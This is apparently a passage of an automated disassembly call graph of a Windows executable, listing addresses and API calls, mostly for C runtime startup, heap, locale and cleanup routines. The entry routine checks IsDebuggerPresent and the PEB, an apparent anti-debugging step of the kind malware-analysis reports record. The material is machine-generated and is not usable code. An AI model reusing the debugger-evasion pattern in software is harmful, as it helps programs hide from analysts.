9573->9572 9577 41398c DecodePointer 9573->9577 9574->9566 9576 4139c6 9575->9576 9576->9491 9577->9572 9579 41395f 9577->9579 9578->9571 9578->9572 9578->9579 9579->9572 9580->9564 9582 411430 GetProcAddress 9581->9582 9583 411440 ExitProcess 9581->9583 9582->9583 9598 4103a2 TlsGetValue 9584->9598 9587 410534 SetLastError 9587->9518 9590 4104fa DecodePointer 9591 41050f 9590->9591 9592 410513 9591->9592 9593 41052b 9591->9593 9607 410413 9592->9607 9620 410cbb 9593->9620 9596 41051b GetCurrentThreadId 9596->9587 9597 410531 9597->9587 9599 4103d2 9598->9599 9600 4103b7 DecodePointer TlsSetValue 9598->9600 9599->9587 9601 412773 9599->9601 9600->9599 9603 41277c 9601->9603 9604 4104f2 9603->9604 9605 41279a Sleep 9603->9605 9626 413b47 9603->9626 9604->9587 9604->9590 9606 4127af 9605->9606 9606->9603 9606->9604 9635 412140 9607->9635 9609 41041f GetModuleHandleW 9636 4126fb 9609->9636 9611 41045d InterlockedIncrement 9643 4104b5 9611->9643 9614 4126fb __lock 64 API calls 9615 41047e 9614->9615 9646 410057 InterlockedIncrement 9615->9646 9617 41049c 9658 4104be 9617->9658 9619 4104a9 ___FrameUnwindToState 9619->9596 9621 410cc6 HeapFree 9620->9621 9625 410cef _free 9620->9625 9622 410cdb 9621->9622 9621->9625 9623 410b21 _raise 64 API calls 9622->9623 9624 410ce1 GetLastError 9623->9624 9624->9625 9625->9597 9627 413b53 9626->9627 9631 413b6e 9626->9631 9628 413b5f 9627->9628 9627->9631 9629 410b21 _raise 65 API calls 9628->9629 9633 413b64 9629->9633 9630 413b81 HeapAlloc 9630->9631 9632 413ba8 9630->9632 9631->9630 9631->9632 9634 4110f1 _malloc DecodePointer 9631->9634 9632->9603 9633->9603 9634->9631 9635->9609 9637 412710 9636->9637 9638 412723 EnterCriticalSection 9636->9638 9661 412639 9637->9661 9638->9611 9640 412716 9640->9638 9686 4116e9 9640->9686 9726 412622 LeaveCriticalSection 9643->9726 9645 410477 9645->9614 9647 410075 InterlockedIncrement 9646->9647 9648 410078 9646->9648 9647->9648 9649 410082 InterlockedIncrement 9648->9649 9650 410085 9648->9650 9649->9650 9651 410092 9650->9651 9652 41008f InterlockedIncrement 9650->9652 9653 41009c InterlockedIncrement 9651->9653 9655 41009f 9651->9655 9652->9651 9653->9655 9654 4100b8 InterlockedIncrement 9654->9655 9655->9654 9656 4100c8 InterlockedIncrement 9655->9656 9657 4100d3 InterlockedIncrement 9655->9657 9656->9655 9657->9617 9727 412622 LeaveCriticalSection 9658->9727 9660 4104c5 9660->9619 9662 412645 ___FrameUnwindToState 9661->9662 9663 41266b 9662->9663 9664 4118dc __FF_MSGBANNER 65 API calls 9662->9664 9672 41267b ___FrameUnwindToState 9663->9672 9693 41272e 9663->9693 9665 41265a 9664->9665 9667 41172d __NMSG_WRITE 65 API calls 9665->9667 9669 412661 9667->9669 9673 411447 _fast_error_exit 3 API calls 9669->9673 9670 41268d 9674 410b21 _raise 65 API calls 9670->9674 9671 41269c 9675 4126fb __lock 65 API calls 9671->9675 9672->9640 9673->9663 9674->9672 9676 4126a3 9675->9676 9677 4126d6 9676->9677 9678 4126ab InitializeCriticalSectionAndSpinCount 9676->9678 9681 410cbb _free 65 API calls 9677->9681 9679 4126c7 9678->9679 9680 4126bb 9678->9680 9698 4126f2 9679->9698 9682 410cbb _free 65 API calls 9680->9682 9681->9679 9683 4126c1 9682->9683 9685 410b21 _raise 65 API calls 9683->9685 9685->9679 9687 4118dc __FF_MSGBANNER 66 API calls 9686->9687 9688 4116f3 9687->9688 9689 41172d __NMSG_WRITE 66 API calls 9688->9689 9690 4116fb 9689->9690 9702 4116b5 9690->9702 9695 412737 9693->9695 9694 410b93 _malloc 65 API calls 9694->9695 9695->9694 9696 412686 9695->9696 9697 41274e Sleep 9695->9697 9696->9670 9696->9671 9697->9695 9701 412622 LeaveCriticalSection 9698->9701 9700 4126f9 9700->9672 9701->9700 9705 41155f 9702->9705 9704 4116c6 9706 41156b ___FrameUnwindToState 9705->9706 9707 4126fb __lock 61 API calls 9706->9707 9708 411572 9707->9708 9710 41159d DecodePointer 9708->9710 9715 41161c 9708->9715 9709 41168a _doexit LeaveCriticalSection 9711 41166a 9709->9711 9712 4115b4 DecodePointer 9710->9712 9710->9715 9713 411699 ___FrameUnwindToState 9711->9713 9714 412622 _doexit LeaveCriticalSection 9711->9714 9724 4115c7 9712->9724 9713->9704 9716 411681 9714->9716 9715->9709 9718 411447 _fast_error_exit GetModuleHandleW GetProcAddress ExitProcess 9716->9718 9717 410390 _raise EncodePointer 9717->9724 9719 41168a 9718->9719 9720 411697 9719->9720 9722 412622 _doexit LeaveCriticalSection 9719->9722 9720->9704 9721 4115de DecodePointer 9723 410390 _raise EncodePointer 9721->9723 9722->9720 9723->9724 9724->9715 9724->9717 9724->9721 9725 4115ed DecodePointer DecodePointer 9724->9725 9725->9724 9726->9645 9727->9660 9729 41109b ___FrameUnwindToState 9728->9729 9736 41145f 9729->9736 9735 4110bc ___FrameUnwindToState 9735->9473 9737 4126fb __lock 66 API calls 9736->9737 9738 4110a0 9737->9738 9739 410fa8 DecodePointer DecodePointer 9738->9739 9740 411057 9739->9740 9741 410fd6 9739->9741 9750 4110c5 9740->9750 9741->9740 9753 4133c2 9741->9753 9743 410fe8 9744 41103a EncodePointer EncodePointer 9743->9744 9745 41100c 9743->9745 9760 4127bf 9743->9760 9744->9740 9745->9740 9747 4127bf __realloc_crt 70 API calls 9745->9747 9748 411028 EncodePointer 9745->9748 9749 411022 9747->9749 9748->9744 9749->9740 9749->9748 9786 411468 9750->9786 9754 4133e2 HeapSize 9753->9754 9755 4133cd 9753->9755 9754->9743 9756 410b21 _raise 66 API calls 9755->9756 9757 4133d2 9756->9757 9758 410acf _raise 11 API calls 9757->9758 9759 4133dd 9758->9759 9759->9743 9764 4127c8 9760->9764 9762 412807 9762->9745 9763 4127e8 Sleep 9763->9764 9764->9762 9764->9763 9765 413bc9 9764->9765 9766 413bd4 9765->9766 9767 413bdf 9765->9767 9768 410b93 _malloc 66 API calls 9766->9768 9769 413be7 9767->9769 9778 413bf4 9767->9778 9770 413bdc 9768->9770 9771 410cbb _free 66 API calls 9769->9771 9770->9764 9785 413bef _free 9771->9785 9772 413c2c 9773 4110f1 _malloc DecodePointer 9772->9773 9775 413c32 9773->9775 9774 413bfc HeapReAlloc 9774->9778 9774->9785 9776 410b21 _raise 66 API calls 9775->9776 9776->9785 9777 413c5c 9779 410b21 _raise 66 API calls 9777->9779 9778->9772 9778->9774 9778->9777 9780 4110f1 _malloc DecodePointer 9778->9780 9782 413c44 9778->9782 9781 413c61 GetLastError 9779->9781 9780->9778 9781->9785 9783 410b21 _raise 66 API calls 9782->9783 9784 413c49 GetLastError 9783->9784 9784->9785 9785->9764 9789 412622 LeaveCriticalSection 9786->9789 9788 4110ca 9788->9735 9789->9788 9791 40e7d7 9790->9791 9794 40e7ec 9790->9794 9796 40e782 9791->9796 9794->9449 9797 40e795 9796->9797 9798 40e78d 9796->9798 9797->9794 9800 40e742 9797->9800 9799 410cbb _free 66 API calls 9798->9799 9799->9797 9801 40e750 _strlen 9800->9801 9804 40e775 9800->9804 9802 410b93 _malloc 66 API calls 9801->9802 9803 40e762 9802->9803 9803->9804 9806 410b34 9803->9806 9804->9794 9807 410b42 9806->9807 9808 410b49 9806->9808 9807->9808 9813 410b67 9807->9813 9809 410b21 _raise 66 API calls 9808->9809 9810 410b4e 9809->9810 9811 410acf _raise 11 API calls 9810->9811 9812 410b58 9811->9812 9812->9804 9813->9812 9814 410b21 _raise 66 API calls 9813->9814 9814->9810 9815 40e4b0 9816 40e4c9 9815->9816 9817 40e4df 9815->9817 9816->9817 9818 40e4e3 CreateFileW 9816->9818 9818->9817 9819 40e509 ReadFile CloseHandle 9818->9819 9819->9817 9820 40f6f6 9860 412140 9820->9860 9822 40f702 GetStartupInfoW 9823 40f716 HeapSetInformation 9822->9823 9825 40f721 9822->9825 9823->9825 9861 412117 HeapCreate 9825->9861 9826 40f76f 9827 40f77a 9826->9827 9989 40f6cd 9826->9989 9862 410689 GetModuleHandleW 9827->9862 9830 40f780 9831 40f78b __RTC_Initialize 9830->9831 9832 40f6cd _fast_error_exit 66 API calls 9830->9832 9887 411e86 GetStartupInfoW 9831->9887 9832->9831 9835 40f7a5 GetCommandLineA 9900 411def GetEnvironmentStringsW 9835->9900 9836 4116e9 __amsg_exit 66 API calls 9838 40f7a4 9836->9838 9838->9835 9842 40f7ca 9926 411abe 9842->9926 9843 4116e9 __amsg_exit 66 API calls 9843->9842 9845 40f7d0 9846 40f7db 9845->9846 9847 4116e9 __amsg_exit 66 API calls 9845->9847 9946 4114c8 9846->9946 9847->9846 9849 40f7e3 9850 40f7ee 9849->9850 9851 4116e9 __amsg_exit 66 API calls 9849->9851 9952 411a5f 9850->9952 9851->9850 9856 40f81e 10000 4116cb 9856->10000 9859 40f823 ___FrameUnwindToState 9860->9822 9861->9826 9863 4106a6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 9862->9863 9864 41069d 9862->9864 9868 4106f0 TlsAlloc 9863->9868 10003 4103d6 9864->10003 9869 4107ff 9868->9869 9870 41073e TlsSetValue 9868->9870 9869->9830 9870->9869 9871 41074f 9870->9871 10013 411471 9871->10013 9876 410797 DecodePointer 9879 4107ac 9876->9879 9877 4107fa 9878 4103d6 __mtterm 70 API calls 9877->9878 9878->9869 9879->9877 9880 412773 __calloc_crt 66 API calls 9879->9880 9881 4107c2 9880->9881 9881->9877 9882 4107ca DecodePointer 9881->9882 9883 4107db 9882->9883 9883->9877 9884 4107df 9883->9884 9885 410413 __getptd_noexit 66 API calls 9884->9885 9886 4107e7 GetCurrentThreadId 9885->9886 9886->9869 9888 412773 __calloc_crt 66 API calls 9887->9888 9894 411ea4 9888->9894 9889 41204f GetStdHandle 9895 412019 9889->9895 9890 412773 __calloc_crt 66 API calls 9890->9894 9891 4120b3 SetHandleCount 9899 40f799 9891->9899 9892 412061 GetFileType 9892->9895 9893 411f99 9893->9895 9896 411fd0 InitializeCriticalSectionAndSpinCount 9893->9896 9897 411fc5 GetFileType 9893->9897 9894->9890 9894->9893 9894->9895 9894->9899 9895->9889 9895->9891 9895->9892 9898 412087 InitializeCriticalSectionAndSpinCount 9895->9898 9896->9893 9896->9899 9897->9893 9897->9896 9898->9895 9898->9899 9899->9835 9899->9836 9901 40f7b5 9900->9901 9902 411e0b WideCharToMultiByte 9900->9902 9913 411d34 9901->9913 9904 411e40 9902->9904 9905 411e78 FreeEnvironmentStringsW 9902->9905 9906 41272e __malloc_crt 66 API calls 9904->9906 9905->9901 9907 411e46 9906->9907 9907->9905 9908 411e4e WideCharToMultiByte 9907->9908 9909 411e60 9908->9909 9910 411e6c FreeEnvironmentStringsW 9908->9910 9911 410cbb _free 66 API calls 9909->9911 9910->9901 9912 411e68 9911->9912 9912->9910 9914 411d49 9913->9914 9915 411d4e GetModuleFileNameA 9913->9915 10030 410039 9914->10030 9917 411d75 9915->9917 10024 411b9a 9917->10024 9920 40f7bf 9920->9842 9920->9843 9921 411db1 9922 41272e __malloc_crt 66 API calls 9921->9922 9923 411db7 9922->9923 9923->9920 9924 411b9a _parse_cmdline 76 API calls 9923->9924 9925 411dd1 9924->9925 9925->9920 9927 411ac7 9926->9927 9930 411acc _strlen 9926->9930 9928 410039 ___initmbctable 94 API calls 9927->9928 9928->9930 9929 412773 __calloc_crt 66 API calls 9935 411b01 _strlen 9929->9935 9930->9929 9933 411ada 9930->9933 9931 411b50 9932 410cbb _free 66 API calls 9931->9932 9932->9933 9933->9845 9934 412773 __calloc_crt 66 API calls 9934->9935 9935->9931 9935->9933 9935->9934 9936 411b76 9935->9936 9938 410b34 _strcpy_s 66 API calls 9935->9938 9939 411b8d 9935->9939 9937 410cbb _free 66 API calls 9936->9937 9937->9933 9938->9935 9940 410a7d __invoke_watson 10 API calls 9939->9940 9941 411b99 9940->9941 9942 413a75 _parse_cmdline 76 API calls 9941->9942 9945 411c26 9941->9945 9942->9941 9943 411d24 9943->9845 9944 413a75 76 API calls _parse_cmdline 9944->9945 9945->9943 9945->9944 9948 4114d6 __IsNonwritableInCurrentImage 9946->9948 10471 4136e3 9948->10471 9949 4114f4 __initterm_e 9950 4110cb __cinit 76 API calls 9949->9950 9951 411515 __IsNonwritableInCurrentImage 9949->9951 9950->9951 9951->9849 9953 411a6d 9952->9953 9956 411a72 9952->9956 9954 410039 ___initmbctable 94 API calls 9953->9954 9954->9956 9955 40f7f4 9958 40deb0 IsDebuggerPresent 9955->9958 9956->9955 9957 413a75 _parse_cmdline 76 API calls 9956->9957 9957->9956 9959 40def4 9958->9959 9960 40df0a 9958->9960 9959->9856 9997 41169f 9959->9997 10474 401100 9960->10474 9963 40dfb0 10481 40de20 9963->10481 9964 40df45 GetPEB 9964->9959 9967 40dfe2 10529 40d7f0 9967->10529 9968 40dfdc 9968->9967 9970 40dfec 9968->9970 9972 40e049 9970->9972 10491 40f476 9970->10491 9972->9959 9974 40e0b1 LocalFree 9972->9974 9974->9959 9976 40e04e 9979 40f476 __wcsicoll 78 API calls 9976->9979 9977 40e00e 9978 40e02c 9977->9978 9981 40f476 __wcsicoll 78 API calls 9977->9981 10499 405b10 9978->10499 9980 40e05f 9979->9980 9983 40e0a6 9980->9983 9984 40e066 9980->9984 9981->9978 9986 40d7f0 92 API calls 9983->9986 9985 40e084 9984->9985 9987 40f476 __wcsicoll 78 API calls 9984->9987 10571 405e10 9985->10571 9986->9972 9987->9985 9990 40f6e0 9989->9990 9991 40f6db 9989->9991 9993 41172d __NMSG_WRITE 66 API calls 9990->9993 9992 4118dc __FF_MSGBANNER 66 API calls 9991->9992 9992->9990 9994 40f6e8 9993->9994 9995 411447 _fast_error_exit 3 API calls 9994->9995 9996 40f6f2 9995->9996 9996->9827 9998 41155f _doexit 66 API calls 9997->9998 9999 4116b0 9998->9999 9999->9856 10001 41155f _doexit 66 API calls 10000->10001 10002 4116d6 10001->10002 10002->9859 10004 4103e0 DecodePointer 10003->10004 10005 4103ef 10003->10005 10004->10005 10006 410400 TlsFree 10005->10006 10007 41040e 10005->10007 10006->10007 10008 4125e7 DeleteCriticalSection 10007->10008 10009 4125ff 10007->10009 10010 410cbb _free 66 API calls 10008->10010 10011 412611 DeleteCriticalSection 10009->10011 10012 4106a2 10009->10012 10010->10007 10011->10009 10012->9830 10022 410390 EncodePointer 10013->10022 10015 411479 __init_pointers __initp_misc_winsig 10023 4134af EncodePointer 10015->10023 10017 410754 EncodePointer EncodePointer EncodePointer EncodePointer 10018 412581 10017->10018 10019 41258c 10018->10019 10020 412596 InitializeCriticalSectionAndSpinCount 10019->10020 10021 410793 10019->10021 10020->10019 10020->10021 10021->9876 10021->9877 10022->10015 10023->10017 10026 411bb9 10024->10026 10028 411c26 10026->10028 10034 413a75 10026->10034 10027 411d24 10027->9920 10027->9921 10028->10027 10029 413a75 76 API calls _parse_cmdline 10028->10029 10029->10028 10031 410042 10030->10031 10033 410049 10030->10033 10358 40fe9f 10031->10358 10033->9915 10037 413a22 10034->10037 10040 40e551 10037->10040 10041 40e564 10040->10041 10047 40e5b1 10040->10047 10048 410540 10041->10048 10044 40e591 10044->10047 10068 40fb96 10044->10068 10047->10026 10049 4104c7 __getptd_noexit 66 API calls 10048->10049 10050 410548 10049->10050 10051 40e569 10050->10051 10052 4116e9 __amsg_exit 66 API calls 10050->10052 10051->10044 10053 410317 10051->10053 10052->10051 10054 410323 ___FrameUnwindToState 10053->10054 10055 410540 __getptd 66 API calls 10054->10055 10056 410328 10055->10056 10057 410356 10056->10057 10058 41033a 10056->10058 10059 4126fb __lock 66 API calls 10057->10059 10060 410540 __getptd 66 API calls 10058->10060 10061 41035d 10059->10061 10064 41033f 10060->10064 10084 4102ca 10061->10084 10066 41034d ___FrameUnwindToState 10064->10066 10067 4116e9 __amsg_exit 66 API calls 10064->10067 10066->10044 10067->10066 10069 40fba2 ___FrameUnwindToState 10068->10069 10070 410540 __getptd 66 API calls 10069->10070 10071 40fba7 10070->10071 10072 4126fb __lock 66 API calls 10071->10072 10080 40fbb9 10071->10080 10075 40fbd7 10072->10075 10073 40fbc7 ___FrameUnwindToState 10073->10047 10074 40fc20 10354 40fc31 10074->10354 10075->10074 10078 40fc08 InterlockedIncrement 10075->10078 10079 40fbee InterlockedDecrement 10075->10079 10076 4116e9 __amsg_exit 66 API calls 10076->10073 10078->10074 10079->10078 10081 40fbf9 10079->10081 10080->10073 10080->10076 10081->10078 10082 410cbb _free 66 API calls 10081->10082 10083 40fc07 10082->10083 10083->10078 10085 4102d7 10084->10085 10086 41030c 10084->10086 10085->10086 10087 410057 ___addlocaleref 8 API calls 10085->10087 10092 410384 10086->10092 10088 4102ed 10087->10088 10088->10086 10095 4100e6 10088->10095 10353 412622 LeaveCriticalSection 10092->10353 10094 41038b 10094->10064 10096 4100f7 InterlockedDecrement 10095->10096 10097 41017a 10095->10097 10098 41010c InterlockedDecrement 10096->10098 10099 41010f 10096->10099 10097->10086 10109 41017f 10097->10109 10098->10099 10100 410119 InterlockedDecrement 10099->10100 10101 41011c 10099->10101 10100->10101 10102 410126 InterlockedDecrement 10101->10102 10103 410129 10101->10103 10102->10103 10104 410133 InterlockedDecrement 10103->10104 10105 410136 10103->10105 10104->10105 10106 41014f InterlockedDecrement 10105->10106 10107 41015f InterlockedDecrement 10105->10107 10108 41016a InterlockedDecrement 10105->10108 10106->10105 10107->10105 10108->10097 10110 410203 10109->10110 10111 410196 10109->10111 10112 410250 10110->10112 10113 410cbb _free 66 API calls 10110->10113 10111->10110 10119 410cbb _free 66 API calls 10111->10119 10122 4101ca 10111->10122 10124 410279 10112->10124 10179 41280d 10112->10179 10115 410224 10113->10115 10117 410cbb _free 66 API calls 10115->10117 10123 410237 10117->10123 10118 410cbb _free 66 API calls 10125 4101f8 10118->10125 10126 4101bf 10119->10126 10120 410cbb _free 66 API calls 10120->10124 10121 4102be 10127 410cbb _free 66 API calls 10121->10127 10128 410cbb _free 66 API calls 10122->10128 10138 4101eb 10122->10138 10130 410cbb _free 66 API calls 10123->10130 10124->10121 10129 410cbb 66 API calls _free 10124->10129 10131 410cbb _free 66 API calls 10125->10131 10139 412bed 10126->10139 10133 4102c4 10127->10133 10134 4101e0 10128->10134 10129->10124 10135 410245 10130->10135 10131->10110 10133->10086 10167 412b84 10134->10167 10137 410cbb _free 66 API calls 10135->10137 10137->10112 10138->10118 10140 412ce7 10139->10140 10141 412bfe 10139->10141 10140->10122 10142 412c0f 10141->10142 10143 410cbb _free 66 API calls 10141->10143 10144 412c21 10142->10144 10146 410cbb _free 66 API calls 10142->10146 10143->10142 10145 412c33 10144->10145 10147 410cbb _free 66 API calls 10144->10147 10148 412c45 10145->10148 10149 410cbb _free 66 API calls 10145->10149 10146->10144 10147->10145 10150 412c57 10148->10150 10151 410cbb _free 66 API calls 10148->10151 10149->10148 10152 412c69 10150->10152 10154 410cbb _free 66 API calls 10150->10154 10151->10150 10153 412c7b 10152->10153 10155 410cbb _free 66 API calls 10152->10155 10156 412c8d 10153->10156 10157 410cbb _free 66 API calls 10153->10157 10154->10152 10155->10153 10158 412c9f 10156->10158 10159 410cbb _free 66 API calls 10156->10159 10157->10156 10160 412cb1 10158->10160 10162 410cbb _free 66 API calls 10158->10162 10159->10158 10161 412cc3 10160->10161 10163 410cbb _free 66 API calls 10160->10163 10164 412cd5 10161->10164 10165 410cbb _free 66 API calls 10161->10165 10162->10160 10163->10161 10164->10140 10166 410cbb _free 66 API calls 10164->10166 10165->10164 10166->10140 10169 412b91 10167->10169 10178 412be9 10167->10178 10168 412ba1 10171 412bb3 10168->10171 10172 410cbb _free 66 API calls 10168->10172 10169->10168 10170 410cbb _free 66 API calls 10169->10170 10170->10168 10173 412bc5 10171->10173 10175 410cbb _free 66 API calls 10171->10175 10172->10171 10174 412bd7 10173->10174 10176 410cbb _free 66 API calls 10173->10176 10177 410cbb _free 66 API calls 10174->10177 10174->10178 10175->10173 10176->10174 10177->10178 10178->10138 10180 41026e 10179->10180 10181 41281e 10179->10181 10180->10120 10182 410cbb _free 66 API calls 10181->10182 10183 412826 10182->10183 10184 410cbb _free 66 API calls 10183->10184 10185 41282e 10184->10185 10186 410cbb _free 66 API calls 10185->10186 10187 412836 10186->10187 10188 410cbb _free 66 API calls 10187->10188 10189 41283e 10188->10189 10190 410cbb _free 66 API calls 10189->10190 10191 412846 10190->10191 10192 410cbb _free 66 API calls 10191->10192 10193 41284e 10192->10193 10194 410cbb _free 66 API calls 10193->10194 10195 412855 10194->10195 10196 410cbb _free 66 API calls 10195->10196 10197 41285d 10196->10197 10198 410cbb _free 66 API calls 10197->10198 10199 412865 10198->10199 10200 410cbb _free 66 API calls 10199->10200 10201 41286d 10200->10201 10202 410cbb _free 66 API calls 10201->10202 10203 412875 10202->10203 10204 410cbb _free 66 API calls 10203->10204 10205 41287d 10204->10205 10206 410cbb _free 66 API calls 10205->10206 10207 412885 10206->10207 10208 410cbb _free 66 API calls 10207->10208 10209 41288d 10208->10209 10210 410cbb _free 66 API calls 10209->10210 10211 412895 10210->10211 10212 410cbb _free 66 API calls 10211->10212 10213 41289d 10212->10213 10214 410cbb _free 66 API calls 10213->10214 10215 4128a8 10214->10215 10216 410cbb _free 66 API calls 10215->10216 10217 4128b0 10216->10217 10218 410cbb _free 66 API calls 10217->10218 10219 4128b8 10218->10219 10220 410cbb _free 66 API calls 10219->10220 10221 4128c0 10220->10221 10222 410cbb _free 66 API calls 10221->10222 10223 4128c8 10222->10223 10224 410cbb _free 66 API calls 10223->10224 10225 4128d0 10224->10225 10226 410cbb _free 66 API calls 10225->10226 10227 4128d8 10226->10227 10228 410cbb _free 66 API calls 10227->10228 10229 4128e0 10228->10229 10230 410cbb _free 66 API calls 10229->10230 10231 4128e8 10230->10231 10232 410cbb _free 66 API calls 10231->10232 10233 4128f0 10232->10233 10234 410cbb _free 66 API calls 10233->10234 10235 4128f8 10234->10235 10236 410cbb _free 66 API calls 10235->10236 10237 412900 10236->10237 10238 410cbb _free 66 API calls 10237->10238 10239 412908 10238->10239 10240 410cbb _free 66 API calls 10239->10240 10241 412910 10240->10241 10242 410cbb _free 66 API calls 10241->10242 10243 412918 10242->10243 10244 410cbb _free 66 API calls 10243->10244 10245 412920 10244->10245 10246 410cbb _free 66 API calls 10245->10246 10247 41292e 10246->10247 10248 410cbb _free 66 API calls 10247->10248 10249 412939 10248->10249 10250 410cbb _free 66 API calls 10249->10250 10251 412944 10250->10251 10252 410cbb _free 66 API calls 10251->10252 10253 41294f 10252->10253 10254 410cbb _free 66 API calls 10253->10254 10255 41295a 10254->10255 10256 410cbb _free 66 API calls 10255->10256 10257 412965 10256->10257 10258 410cbb _free 66 API calls 10257->10258 10259 412970 10258->10259 10260 410cbb _free 66 API calls 10259->10260 10261 41297b 10260->10261 10262 410cbb _free 66 API calls 10261->10262 10263 412986 10262->10263 10264 410cbb _free 66 API calls 10263->10264 10265 412991 10264->10265 10266 410cbb _free 66 API calls 10265->10266 10267 41299c 10266->10267 10268 410cbb _free 66 API calls 10267->10268 10269 4129a7 10268->10269 10270 410cbb _free 66 API calls 10269->10270 10271 4129b2 10270->10271 10272 410cbb _free 66 API calls 10271->10272 10273 4129bd 10272->10273 10274 410cbb _free 66 API calls 10273->10274 10275 4129c8 10274->10275 10276 410cbb _free 66 API calls 10275->10276 10277 4129d3 10276->10277 10278 410cbb _free 66 API calls 10277->10278 10279 4129e1 10278->10279 10280 410cbb _free 66 API calls 10279->10280 10281 4129ec 10280->10281 10282 410cbb _free 66 API calls 10281->10282 10283 4129f7 10282->10283 10284 410cbb _free 66 API calls 10283->10284 10285 412a02 10284->10285 10286 410cbb _free 66 API calls 10285->10286 10287 412a0d 10286->10287 10288 410cbb _free 66 API calls 10287->10288 10289 412a18 10288->10289 10290 410cbb _free 66 API calls 10289->10290 10291 412a23 10290->10291 10292 410cbb _free 66 API calls 10291->10292 10293 412a2e 10292->10293 10294 410cbb _free 66 API calls 10293->10294 10295 412a39 10294->10295 10296 410cbb _free 66 API calls 10295->10296 10297 412a44 10296->10297 10298 410cbb _free 66 API calls 10297->10298 10299 412a4f 10298->10299 10300 410cbb _free 66 API calls 10299->10300 10301 412a5a 10300->10301 10302 410cbb _free 66 API calls 10301->10302 10303 412a65 10302->10303 10304 410cbb _free 66 API calls 10303->10304 10305 412a70 10304->10305 10306 410cbb _free 66 API calls 10305->10306 10307 412a7b 10306->10307 10308 410cbb _free 66 API calls 10307->10308 10309 412a86 10308->10309 10310 410cbb _free 66 API calls 10309->10310 10311 412a94 10310->10311 10312 410cbb _free 66 API calls 10311->10312 10313 412a9f 10312->10313 10314 410cbb _free 66 API calls 10313->10314 10315 412aaa 10314->10315 10316 410cbb _free 66 API calls 10315->10316 10317 412ab5 10316->10317 10318 410cbb _free 66 API calls 10317->10318 10319 412ac0 10318->10319 10320 410cbb _free 66 API calls 10319->10320 10321 412acb 10320->10321 10322 410cbb _free 66 API calls 10321->10322 10323 412ad6 10322->10323 10324 410cbb _free 66 API calls 10323->10324 10325 412ae1 10324->10325 10326 410cbb _free 66 API calls 10325->10326 10327 412aec 10326->10327 10328 410cbb _free 66 API calls 10327->10328 10329 412af7 10328->10329 10330 410cbb _free 66 API calls 10329->10330 10331 412b02 10330->10331 10332 410cbb _free 66 API calls 10331->10332 10333 412b0d 10332->10333 10334 410cbb _free 66 API calls 10333->10334 10335 412b18 10334->10335 10336 410cbb _free 66 API calls 10335->10336 10337 412b23 10336->10337 10338 410cbb _free 66 API calls 10337->10338 10339 412b2e 10338->10339 10340 410cbb _free 66 API calls 10339->10340 10341 412b39 10340->10341 10342 410cbb _free 66 API calls 10341->10342 10343 412b47 10342->10343 10344 410cbb _free 66 API calls 10343->10344 10345 412b52 10344->10345 10346 410cbb _free 66 API calls 10345->10346 10347 412b5d 10346->10347 10348 410cbb _free 66 API calls 10347->10348 10349 412b68 10348->10349 10350 410cbb _free 66 API calls 10349->10350 10351 412b73 10350->10351 10352 410cbb _free 66 API calls 10351->10352 10352->10180 10353->10094 10357 412622 LeaveCriticalSection 10354->10357 10356 40fc38 10356->10080 10357->10356 10359 40feab ___FrameUnwindToState 10358->10359 10360 410540 __getptd 66 API calls 10359->10360 10361 40feb4 10360->10361 10362 40fb96 _LocaleUpdate::_LocaleUpdate 68 API calls 10361->10362 10363 40febe 10362->10363 10389 40fc3a 10363->10389 10366 41272e __malloc_crt 66 API calls 10367 40fedf 10366->10367 10368 40fffe ___FrameUnwindToState 10367->10368 10396 40fcb6 10367->10396 10368->10033 10371 41000b 10371->10368 10375 41001e 10371->10375 10377 410cbb _free 66 API calls 10371->10377 10372 40ff0f InterlockedDecrement 10373 40ff30 InterlockedIncrement 10372->10373 10374 40ff1f 10372->10374 10373->10368 10376 40ff46 10373->10376 10374->10373 10379 410cbb _free 66 API calls 10374->10379 10378 410b21 _raise 66 API calls 10375->10378 10376->10368 10380 4126fb __lock 66 API calls 10376->10380 10377->10375 10378->10368 10381 40ff2f 10379->10381 10383 40ff5a InterlockedDecrement 10380->10383 10381->10373 10384 40ffd6 10383->10384 10385 40ffe9 InterlockedIncrement 10383->10385 10384->10385 10387 410cbb _free 66 API calls 10384->10387 10406 410000 10385->10406 10388 40ffe8 10387->10388 10388->10385 10390 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 10389->10390 10391 40fc4e 10390->10391 10392 40fc77 10391->10392 10393 40fc59 GetOEMCP 10391->10393 10394 40fc7c GetACP 10392->10394 10395 40fc69 10392->10395 10393->10395 10394->10395 10395->10366 10395->10368 10397 40fc3a getSystemCP 78 API calls 10396->10397 10398 40fcd6 10397->10398 10401 40fd25 IsValidCodePage 10398->10401 10403 40fce1 setSBCS 10398->10403 10405 40fd4a _memset __setmbcp_nolock 10398->10405 10399 40e542 __ld12tod 5 API calls 10400 40fe9d 10399->10400 10400->10371 10400->10372 10402 40fd37 GetCPInfo 10401->10402 10401->10403 10402->10403 10402->10405 10403->10399 10409 40fa06 GetCPInfo 10405->10409 10470 412622 LeaveCriticalSection 10406->10470 10408 410007 10408->10368 10411 40fa3a _memset 10409->10411 10418 40faee 10409->10418 10419 412541 10411->10419 10413 40e542 __ld12tod 5 API calls 10416 40fb94 10413->10416 10416->10405 10417 41134c ___crtLCMapStringA 82 API calls 10417->10418 10418->10413 10420 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 10419->10420 10421 412554 10420->10421 10429 41245a 10421->10429 10424 41134c 10425 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 10424->10425 10426 41135f 10425->10426 10446 411165 10426->10446 10430 412483 MultiByteToWideChar 10429->10430 10431 412478 10429->10431 10434 4124b0 10430->10434 10441 4124ac 10430->10441 10431->10430 10432 40e542 __ld12tod 5 API calls 10435 40faa9 10432->10435 10433 4124c5 _memset __crtGetStringTypeA_stat 10437 4124fe MultiByteToWideChar 10433->10437 10433->10441 10434->10433 10436 410b93 _malloc 66 API calls 10434->10436 10435->10424 10436->10433 10438 412525 10437->10438 10439 412514 GetStringTypeW 10437->10439 10442 40f127 10438->10442 10439->10438 10441->10432 10443 40f133 10442->10443 10444 40f144 10442->10444 10443->10444 10445 410cbb _free 66 API calls 10443->10445 10444->10441 10445->10444 10448 411183 MultiByteToWideChar 10446->10448 10449 4111e1 10448->10449 10453 4111e8 10448->10453 10450 40e542 __ld12tod 5 API calls 10449->10450 10452 40fac9 10450->10452 10451 411235 MultiByteToWideChar 10454 41132d 10451->10454 10455 41124e LCMapStringW 10451->10455 10452->10417 10456 410b93 _malloc 66 API calls 10453->10456 10459 411201 __crtGetStringTypeA_stat 10453->10459 10457 40f127 